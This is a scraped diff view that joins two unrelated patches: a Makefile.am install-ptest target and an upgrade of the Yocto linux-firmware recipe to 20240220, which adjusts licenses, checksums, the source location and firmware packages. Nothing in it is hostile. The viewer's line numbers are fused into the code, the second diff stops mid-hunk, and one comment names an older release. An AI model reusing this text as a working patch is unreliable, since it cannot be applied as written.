6diff -ruN a/Makefile.am b/Makefile.am
7--- a/Makefile.am 2013-07-12 17:11:05.278331557 +0200
8+++ b/Makefile.am 2013-07-12 17:14:27.033788016 +0200
9@@ -204,6 +204,16 @@
10
11 distclean-local: $(DISTCLEAN_LOCAL_HOOKS)
12
13+install-ptest:
14+ @$(MKDIR_P) $(DESTDIR)/testsuite
15+ @for file in $(TESTSUITE); do \
16+ install $$file $(DESTDIR)/testsuite; \
17+ done;
18+ @sed -e 's/^Makefile/_Makefile/' < Makefile > $(DESTDIR)/Makefile
19+ @$(MKDIR_P) $(DESTDIR)/tools
20+ @cp $(noinst_SCRIPTS) $(noinst_PROGRAMS) $(DESTDIR)/tools
21+ @cp -r testsuite/rootfs testsuite/.libs $(DESTDIR)/testsuite
22+
23 # ------------------------------------------------------------------------------
24 # custom release helpers
25 # ------------------------------------------------------------------------------
diff --git a/meta/recipes-kernel/linux-firmware/linux-firmware_20201218.bb b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
index 700a79b118..873ba9cdf0 100644
--- a/meta/recipes-kernel/linux-firmware/linux-firmware_20201218.bb
+++ b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Firmware files for use with Linux kernel" 1SUMMARY = "Firmware files for use with Linux kernel"
2HOMEPAGE = "https://www.kernel.org/"
3DESCRIPTION = "Linux firmware is a package distributed alongside the Linux kernel \
4that contains firmware binary blobs necessary for partial or full functionality \
5of certain hardware devices."
2SECTION = "kernel" 6SECTION = "kernel"
3 7
4LICENSE = "\ 8LICENSE = "\
@@ -23,7 +27,6 @@ LICENSE = "\
23 & Firmware-go7007 \ 27 & Firmware-go7007 \
24 & Firmware-GPLv2 \ 28 & Firmware-GPLv2 \
25 & Firmware-hfi1_firmware \ 29 & Firmware-hfi1_firmware \
26 & Firmware-i2400m \
27 & Firmware-i915 \ 30 & Firmware-i915 \
28 & Firmware-ibt_firmware \ 31 & Firmware-ibt_firmware \
29 & Firmware-ice \ 32 & Firmware-ice \
@@ -42,6 +45,7 @@ LICENSE = "\
42 & Firmware-phanfw \ 45 & Firmware-phanfw \
43 & Firmware-qat \ 46 & Firmware-qat \
44 & Firmware-qcom \ 47 & Firmware-qcom \
48 & Firmware-qcom-yamato \
45 & Firmware-qla1280 \ 49 & Firmware-qla1280 \
46 & Firmware-qla2xxx \ 50 & Firmware-qla2xxx \
47 & Firmware-qualcommAthos_ar3k \ 51 & Firmware-qualcommAthos_ar3k \
@@ -53,7 +57,6 @@ LICENSE = "\
53 & Firmware-rtlwifi_firmware \ 57 & Firmware-rtlwifi_firmware \
54 & Firmware-imx-sdma_firmware \ 58 & Firmware-imx-sdma_firmware \
55 & Firmware-siano \ 59 & Firmware-siano \
56 & Firmware-tda7706-firmware \
57 & Firmware-ti-connectivity \ 60 & Firmware-ti-connectivity \
58 & Firmware-ti-keystone \ 61 & Firmware-ti-keystone \
59 & Firmware-ueagle-atm4-firmware \ 62 & Firmware-ueagle-atm4-firmware \
@@ -68,8 +71,8 @@ LICENSE = "\
68LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \ 71LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
69 file://LICENCE.adsp_sst;md5=615c45b91a5a4a9fe046d6ab9a2df728 \ 72 file://LICENCE.adsp_sst;md5=615c45b91a5a4a9fe046d6ab9a2df728 \
70 file://LICENCE.agere;md5=af0133de6b4a9b2522defd5f188afd31 \ 73 file://LICENCE.agere;md5=af0133de6b4a9b2522defd5f188afd31 \
71 file://LICENSE.amdgpu;md5=d357524f5099e2a3db3c1838921c593f \ 74 file://LICENSE.amdgpu;md5=a2589a05ea5b6bd2b7f4f623c7e7a649 \
72 file://LICENSE.amd-ucode;md5=3c5399dc9148d7f0e1f41e34b69cf14f \ 75 file://LICENSE.amd-ucode;md5=6ca90c57f7b248de1e25c7f68ffc4698 \
73 file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \ 76 file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \
74 file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \ 77 file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \
75 file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \ 78 file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \
@@ -87,13 +90,12 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
87 file://LICENCE.go7007;md5=c0bb9f6aaaba55b0529ee9b30aa66beb \ 90 file://LICENCE.go7007;md5=c0bb9f6aaaba55b0529ee9b30aa66beb \
88 file://GPL-2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ 91 file://GPL-2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
89 file://LICENSE.hfi1_firmware;md5=5e7b6e586ce7339d12689e49931ad444 \ 92 file://LICENSE.hfi1_firmware;md5=5e7b6e586ce7339d12689e49931ad444 \
90 file://LICENCE.i2400m;md5=14b901969e23c41881327c0d9e4b7d36 \
91 file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \ 93 file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \
92 file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \ 94 file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \
93 file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \ 95 file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \
94 file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \ 96 file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \
95 file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \ 97 file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \
96 file://LICENCE.iwlwifi_firmware;md5=3fd842911ea93c29cd32679aa23e1c88 \ 98 file://LICENCE.iwlwifi_firmware;md5=2ce6786e0fc11ac6e36b54bb9b799f1b \
97 file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \ 99 file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \
98 file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \ 100 file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \
99 file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \ 101 file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \
@@ -106,8 +108,9 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
106 file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \ 108 file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \
107 file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \ 109 file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \
108 file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \ 110 file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \
109 file://LICENCE.qat_firmware;md5=9e7d8bea77612d7cc7d9e9b54b623062 \ 111 file://LICENCE.qat_firmware;md5=72de83dfd9b87be7685ed099a39fbea4 \
110 file://LICENSE.qcom;md5=164e3362a538eb11d3ac51e8e134294b \ 112 file://LICENSE.qcom;md5=164e3362a538eb11d3ac51e8e134294b \
113 file://LICENSE.qcom_yamato;md5=d0de0eeccaf1843a850bf7a6777eec5c \
111 file://LICENCE.qla1280;md5=d6895732e622d950609093223a2c4f5d \ 114 file://LICENCE.qla1280;md5=d6895732e622d950609093223a2c4f5d \
112 file://LICENCE.qla2xxx;md5=505855e921b75f1be4a437ad9b79dff0 \ 115 file://LICENCE.qla2xxx;md5=505855e921b75f1be4a437ad9b79dff0 \
113 file://LICENSE.QualcommAtheros_ar3k;md5=b5fe244fb2b532311de1472a3bc06da5 \ 116 file://LICENSE.QualcommAtheros_ar3k;md5=b5fe244fb2b532311de1472a3bc06da5 \
@@ -119,7 +122,6 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
119 file://LICENCE.rtlwifi_firmware.txt;md5=00d06cfd3eddd5a2698948ead2ad54a5 \ 122 file://LICENCE.rtlwifi_firmware.txt;md5=00d06cfd3eddd5a2698948ead2ad54a5 \
120 file://LICENSE.sdma_firmware;md5=51e8c19ecc2270f4b8ea30341ad63ce9 \ 123 file://LICENSE.sdma_firmware;md5=51e8c19ecc2270f4b8ea30341ad63ce9 \
121 file://LICENCE.siano;md5=4556c1bf830067f12ca151ad953ec2a5 \ 124 file://LICENCE.siano;md5=4556c1bf830067f12ca151ad953ec2a5 \
122 file://LICENCE.tda7706-firmware.txt;md5=835997cf5e3c131d0dddd695c7d9103e \
123 file://LICENCE.ti-connectivity;md5=c5e02be633f1499c109d1652514d85ec \ 125 file://LICENCE.ti-connectivity;md5=c5e02be633f1499c109d1652514d85ec \
124 file://LICENCE.ti-keystone;md5=3a86335d32864b0bef996bee26cc0f2c \ 126 file://LICENCE.ti-keystone;md5=3a86335d32864b0bef996bee26cc0f2c \
125 file://LICENCE.ueagle-atm4-firmware;md5=4ed7ea6b507ccc583b9d594417714118 \ 127 file://LICENCE.ueagle-atm4-firmware;md5=4ed7ea6b507ccc583b9d594417714118 \
@@ -128,8 +130,11 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
128 file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \ 130 file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \
129 file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \ 131 file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \
130 file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \ 132 file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \
131 file://WHENCE;md5=03f0fad70b8b557b56084e3090198021 \ 133 file://WHENCE;md5=${WHENCE_CHKSUM} \
132 " 134 "
135# WHENCE checksum is defined separately to ease overriding it if
136# class-devupstream is selected.
137WHENCE_CHKSUM = "a344e6c28970fc7daafa81c10247aeb6"
133 138
134# These are not common licenses, set NO_GENERIC_LICENSE for them 139# These are not common licenses, set NO_GENERIC_LICENSE for them
135# so that the license files will be copied from fetched source 140# so that the license files will be copied from fetched source
@@ -155,7 +160,6 @@ NO_GENERIC_LICENSE[Firmware-fw_sst_0f28] = "LICENCE.fw_sst_0f28"
155NO_GENERIC_LICENSE[Firmware-go7007] = "LICENCE.go7007" 160NO_GENERIC_LICENSE[Firmware-go7007] = "LICENCE.go7007"
156NO_GENERIC_LICENSE[Firmware-GPLv2] = "GPL-2" 161NO_GENERIC_LICENSE[Firmware-GPLv2] = "GPL-2"
157NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware" 162NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware"
158NO_GENERIC_LICENSE[Firmware-i2400m] = "LICENCE.i2400m"
159NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915" 163NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915"
160NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware" 164NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware"
161NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice" 165NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice"
@@ -175,6 +179,7 @@ NO_GENERIC_LICENSE[Firmware-ath9k-htc] = "LICENCE.open-ath9k-htc-firmware"
175NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw" 179NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw"
176NO_GENERIC_LICENSE[Firmware-qat] = "LICENCE.qat_firmware" 180NO_GENERIC_LICENSE[Firmware-qat] = "LICENCE.qat_firmware"
177NO_GENERIC_LICENSE[Firmware-qcom] = "LICENSE.qcom" 181NO_GENERIC_LICENSE[Firmware-qcom] = "LICENSE.qcom"
182NO_GENERIC_LICENSE[Firmware-qcom-yamato] = "LICENSE.qcom_yamato"
178NO_GENERIC_LICENSE[Firmware-qla1280] = "LICENCE.qla1280" 183NO_GENERIC_LICENSE[Firmware-qla1280] = "LICENCE.qla1280"
179NO_GENERIC_LICENSE[Firmware-qla2xxx] = "LICENCE.qla2xxx" 184NO_GENERIC_LICENSE[Firmware-qla2xxx] = "LICENCE.qla2xxx"
180NO_GENERIC_LICENSE[Firmware-qualcommAthos_ar3k] = "LICENSE.QualcommAtheros_ar3k" 185NO_GENERIC_LICENSE[Firmware-qualcommAthos_ar3k] = "LICENSE.QualcommAtheros_ar3k"
@@ -186,7 +191,6 @@ NO_GENERIC_LICENSE[Firmware-ralink-firmware] = "LICENCE.ralink-firmware.txt"
186NO_GENERIC_LICENSE[Firmware-rtlwifi_firmware] = "LICENCE.rtlwifi_firmware.txt" 191NO_GENERIC_LICENSE[Firmware-rtlwifi_firmware] = "LICENCE.rtlwifi_firmware.txt"
187NO_GENERIC_LICENSE[Firmware-siano] = "LICENCE.siano" 192NO_GENERIC_LICENSE[Firmware-siano] = "LICENCE.siano"
188NO_GENERIC_LICENSE[Firmware-imx-sdma_firmware] = "LICENSE.sdma_firmware" 193NO_GENERIC_LICENSE[Firmware-imx-sdma_firmware] = "LICENSE.sdma_firmware"
189NO_GENERIC_LICENSE[Firmware-tda7706-firmware] = "LICENCE.tda7706-firmware.txt"
190NO_GENERIC_LICENSE[Firmware-ti-connectivity] = "LICENCE.ti-connectivity" 194NO_GENERIC_LICENSE[Firmware-ti-connectivity] = "LICENCE.ti-connectivity"
191NO_GENERIC_LICENSE[Firmware-ti-keystone] = "LICENCE.ti-keystone" 195NO_GENERIC_LICENSE[Firmware-ti-keystone] = "LICENCE.ti-keystone"
192NO_GENERIC_LICENSE[Firmware-ueagle-atm4-firmware] = "LICENCE.ueagle-atm4-firmware" 196NO_GENERIC_LICENSE[Firmware-ueagle-atm4-firmware] = "LICENCE.ueagle-atm4-firmware"
@@ -199,9 +203,16 @@ NO_GENERIC_LICENSE[WHENCE] = "WHENCE"
199 203
200PE = "1" 204PE = "1"
201 205
202SRC_URI = "${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz" 206SRC_URI = "\
207 ${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz \
208"
209
210BBCLASSEXTEND = "devupstream:target"
211SRC_URI:class-devupstream = "git://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git;protocol=https;branch=main"
212# Pin this to the 20220509 release, override this in local.conf
213SRCREV:class-devupstream ?= "b19cbdca78ab2adfd210c91be15a22568e8b8cae"
203 214
204SRC_URI[sha256sum] = "a1cc1ff72c739f312b095df589e9fd639fc81c3f8f7966377ea35222dc94c04b" 215SRC_URI[sha256sum] = "bf0f239dc0801e9d6bf5d5fb3e2f549575632cf4688f4348184199cb02c2bcd7"
205 216
206inherit allarch 217inherit allarch
207 218
@@ -212,7 +223,8 @@ do_compile() {
212} 223}
213 224
214do_install() { 225do_install() {
215 oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install 226 # install-nodedup avoids rdfind dependency
227 oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install-nodedup
216 cp GPL-2 LICEN[CS]E.* WHENCE ${D}${nonarch_base_libdir}/firmware/ 228 cp GPL-2 LICEN[CS]E.* WHENCE ${D}${nonarch_base_libdir}/firmware/
217} 229}
218 230
@@ -225,8 +237,10 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
225 ${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \ 237 ${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \
226 ${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \ 238 ${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \
227 ${PN}-vt6656-license ${PN}-vt6656 \ 239 ${PN}-vt6656-license ${PN}-vt6656 \
240 ${PN}-rs9113 ${PN}-rs9116 \
228 ${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \ 241 ${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \
229 ${PN}-rtl8168 \ 242 ${PN}-rtl8168 \
243 ${PN}-rtl8822 \
230 ${PN}-cypress-license \ 244 ${PN}-cypress-license \
231 ${PN}-broadcom-license \ 245 ${PN}-broadcom-license \
232 ${PN}-bcm-0bb4-0306 \ 246 ${PN}-bcm-0bb4-0306 \
@@ -296,10 +310,20 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
296 ${PN}-nvidia-gpu \ 310 ${PN}-nvidia-gpu \
297 ${PN}-netronome-license ${PN}-netronome \ 311 ${PN}-netronome-license ${PN}-netronome \
298 ${PN}-qat ${PN}-qat-license \ 312 ${PN}-qat ${PN}-qat-license \
299 ${PN}-qcom-license \ 313 ${PN}-qcom-license ${PN}-qcom-yamato-license \
300 ${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \ 314 ${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \
301 ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a530 ${PN}-qcom-adreno-a630 \ 315 ${PN}-qcom-vpu-1.0 ${PN}-qcom-vpu-2.0 \
302 ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \ 316 ${PN}-qcom-adreno-a2xx ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a4xx ${PN}-qcom-adreno-a530 \
317 ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 \
318 ${PN}-qcom-apq8016-modem ${PN}-qcom-apq8016-wifi \
319 ${PN}-qcom-apq8096-adreno ${PN}-qcom-apq8096-audio ${PN}-qcom-apq8096-modem \
320 ${PN}-qcom-sc8280xp-lenovo-x13s-compat \
321 ${PN}-qcom-sc8280xp-lenovo-x13s-audio \
322 ${PN}-qcom-sc8280xp-lenovo-x13s-adreno \
323 ${PN}-qcom-sc8280xp-lenovo-x13s-compute \
324 ${PN}-qcom-sc8280xp-lenovo-x13s-sensors \
325 ${PN}-qcom-sdm845-adreno ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \
326 ${PN}-qcom-sm8250-adreno ${PN}-qcom-sm8250-audio ${PN}-qcom-sm8250-compute \
303 ${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \ 327 ${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \
304 ${PN}-lt9611uxc ${PN}-lontium-license \ 328 ${PN}-lt9611uxc ${PN}-lontium-license \
305 ${PN}-whence-license \ 329 ${PN}-whence-license \
@@ -344,7 +368,7 @@ FILES_${PN}-carl9170 = " \
344RDEPENDS_${PN}-carl9170 += "${PN}-gplv2-license" 368RDEPENDS_${PN}-carl9170 += "${PN}-gplv2-license"
345 369
346# For QualCommAthos 370# For QualCommAthos
347LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k" 371LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k & Firmware-atheros_firmware"
348LICENSE_${PN}-ar3k-license = "Firmware-qualcommAthos_ar3k" 372LICENSE_${PN}-ar3k-license = "Firmware-qualcommAthos_ar3k"
349LICENSE_${PN}-ath10k = "Firmware-qualcommAthos_ath10k" 373LICENSE_${PN}-ath10k = "Firmware-qualcommAthos_ath10k"
350LICENSE_${PN}-ath10k-license = "Firmware-qualcommAthos_ath10k" 374LICENSE_${PN}-ath10k-license = "Firmware-qualcommAthos_ath10k"
@@ -368,7 +392,7 @@ FILES_${PN}-qca = " \
368 ${nonarch_base_libdir}/firmware/qca \ 392 ${nonarch_base_libdir}/firmware/qca \
369" 393"
370 394
371RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license" 395RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license ${PN}-atheros-license"
372RDEPENDS_${PN}-ath10k += "${PN}-ath10k-license" 396RDEPENDS_${PN}-ath10k += "${PN}-ath10k-license"
373RDEPENDS_${PN}-ath11k += "${PN}-ath10k-license" 397RDEPENDS_${PN}-ath11k += "${PN}-ath10k-license"
374RDEPENDS_${PN}-qca += "${PN}-ath10k-license" 398RDEPENDS_${PN}-qca += "${PN}-ath10k-license"
@@ -390,7 +414,7 @@ LICENSE_${PN}-mt7601u-license = "Firmware-ralink_a_mediatek_company_firmware"
390 414
391FILES_${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware" 415FILES_${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware"
392FILES_${PN}-mt7601u = " \ 416FILES_${PN}-mt7601u = " \
393 ${nonarch_base_libdir}/firmware/mt7601u.bin \ 417 ${nonarch_base_libdir}/firmware/mediatek/mt7601u.bin \
394" 418"
395 419
396RDEPENDS_${PN}-mt7601u += "${PN}-mt7601u-license" 420RDEPENDS_${PN}-mt7601u += "${PN}-mt7601u-license"
@@ -492,6 +516,13 @@ FILES_${PN}-netronome = " \
492 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0096*.nffw \ 516 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0096*.nffw \
493 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0097*.nffw \ 517 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0097*.nffw \
494 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0099*.nffw \ 518 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0099*.nffw \
519 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0011_2x40.nffw \
520 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0012_2x40.nffw \
521 ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0078-0011_1x100.nffw \
522 ${nonarch_base_libdir}/firmware/netronome/bpf \
523 ${nonarch_base_libdir}/firmware/netronome/flower \
524 ${nonarch_base_libdir}/firmware/netronome/nic \
525 ${nonarch_base_libdir}/firmware/netronome/nic-sriov \
495" 526"
496 527
497RDEPENDS_${PN}-netronome += "${PN}-netronome-license" 528RDEPENDS_${PN}-netronome += "${PN}-netronome-license"
@@ -518,6 +549,16 @@ RDEPENDS_${PN}-nvidia-gpu += "${PN}-nvidia-license"
518RDEPENDS_${PN}-nvidia-tegra += "${PN}-nvidia-license" 549RDEPENDS_${PN}-nvidia-tegra += "${PN}-nvidia-license"
519RDEPENDS_${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license" 550RDEPENDS_${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license"
520 551
552# For RSI RS911x WiFi
553LICENSE_${PN}-rs9113 = "WHENCE"
554LICENSE_${PN}-rs9116 = "WHENCE"
555
556FILES_${PN}-rs9113 = " ${nonarch_base_libdir}/firmware/rsi/rs9113*.rps "
557FILES_${PN}-rs9116 = " ${nonarch_base_libdir}/firmware/rsi/rs9116*.rps "
558
559RDEPENDS_${PN}-rs9113 += "${PN}-whence-license"
560RDEPENDS_${PN}-rs9116 += "${PN}-whence-license"
561
521# For rtl 562# For rtl
522LICENSE_${PN}-rtl8188 = "Firmware-rtlwifi_firmware" 563LICENSE_${PN}-rtl8188 = "Firmware-rtlwifi_firmware"
523LICENSE_${PN}-rtl8192cu = "Firmware-rtlwifi_firmware" 564LICENSE_${PN}-rtl8192cu = "Firmware-rtlwifi_firmware"
@@ -525,6 +566,7 @@ LICENSE_${PN}-rtl8192ce = "Firmware-rtlwifi_firmware"
525LICENSE_${PN}-rtl8192su = "Firmware-rtlwifi_firmware" 566LICENSE_${PN}-rtl8192su = "Firmware-rtlwifi_firmware"
526LICENSE_${PN}-rtl8723 = "Firmware-rtlwifi_firmware" 567LICENSE_${PN}-rtl8723 = "Firmware-rtlwifi_firmware"
527LICENSE_${PN}-rtl8821 = "Firmware-rtlwifi_firmware" 568LICENSE_${PN}-rtl8821 = "Firmware-rtlwifi_firmware"
569LICENSE_${PN}-rtl8822 = "Firmware-rtlwifi_firmware"
528LICENSE_${PN}-rtl-license = "Firmware-rtlwifi_firmware" 570LICENSE_${PN}-rtl-license = "Firmware-rtlwifi_firmware"
529LICENSE_${PN}-rtl8168 = "WHENCE" 571LICENSE_${PN}-rtl8168 = "WHENCE"
530 572
@@ -552,6 +594,11 @@ FILES_${PN}-rtl8821 = " \
552FILES_${PN}-rtl8168 = " \ 594FILES_${PN}-rtl8168 = " \
553 ${nonarch_base_libdir}/firmware/rtl_nic/rtl8168*.fw \ 595 ${nonarch_base_libdir}/firmware/rtl_nic/rtl8168*.fw \
554" 596"
597FILES_${PN}-rtl8822 = " \
598 ${nonarch_base_libdir}/firmware/rtl_bt/rtl8822*.bin \
599 ${nonarch_base_libdir}/firmware/rtw88/rtw8822*.bin \
600 ${nonarch_base_libdir}/firmware/rtlwifi/rtl8822*.bin \
601"
555 602
556RDEPENDS_${PN}-rtl8188 += "${PN}-rtl-license" 603RDEPENDS_${PN}-rtl8188 += "${PN}-rtl-license"
557RDEPENDS_${PN}-rtl8192ce += "${PN}-rtl-license" 604RDEPENDS_${PN}-rtl8192ce += "${PN}-rtl-license"
@@ -559,6 +606,7 @@ RDEPENDS_${PN}-rtl8192cu += "${PN}-rtl-license"
559RDEPENDS_${PN}-rtl8192su = "${PN}-rtl-license" 606RDEPENDS_${PN}-rtl8192su = "${PN}-rtl-license"
560RDEPENDS_${PN}-rtl8723 += "${PN}-rtl-license" 607RDEPENDS_${PN}-rtl8723 += "${PN}-rtl-license"
561RDEPENDS_${PN}-rtl8821 += "${PN}-rtl-license" 608RDEPENDS_${PN}-rtl8821 += "${PN}-rtl-license"
609RDEPENDS_${PN}-rtl8822 += "${PN}-rtl-license"
562RDEPENDS_${PN}-rtl8168 += "${PN}-whence-license" 610RDEPENDS_${PN}-rtl8168 += "${PN}-whence-license"
563 611
564# For ti-connectivity 612# For ti-connectivity
@@ -618,7 +666,9 @@ FILES_${PN}-bcm4329 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4329-sdio.bi
618FILES_${PN}-bcm4330 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4330-sdio.*" 666FILES_${PN}-bcm4330 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4330-sdio.*"
619FILES_${PN}-bcm4334 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4334-sdio.bin" 667FILES_${PN}-bcm4334 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4334-sdio.bin"
620FILES_${PN}-bcm4335 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4335-sdio.bin" 668FILES_${PN}-bcm4335 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4335-sdio.bin"
621FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin" 669FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin \
670 ${nonarch_base_libdir}/firmware/cypress/cyfmac4339-sdio.bin \
671"
622FILES_${PN}-bcm43241b0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b0-sdio.bin" 672FILES_${PN}-bcm43241b0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b0-sdio.bin"
623FILES_${PN}-bcm43241b4 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b4-sdio.bin" 673FILES_${PN}-bcm43241b4 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b4-sdio.bin"
624FILES_${PN}-bcm43241b5 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b5-sdio.bin" 674FILES_${PN}-bcm43241b5 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b5-sdio.bin"
@@ -627,12 +677,18 @@ FILES_${PN}-bcm43143 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43143.bin \
627 ${nonarch_base_libdir}/firmware/brcm/brcmfmac43143-sdio.bin \ 677 ${nonarch_base_libdir}/firmware/brcm/brcmfmac43143-sdio.bin \
628" 678"
629FILES_${PN}-bcm43430a0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430a0-sdio.*" 679FILES_${PN}-bcm43430a0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430a0-sdio.*"
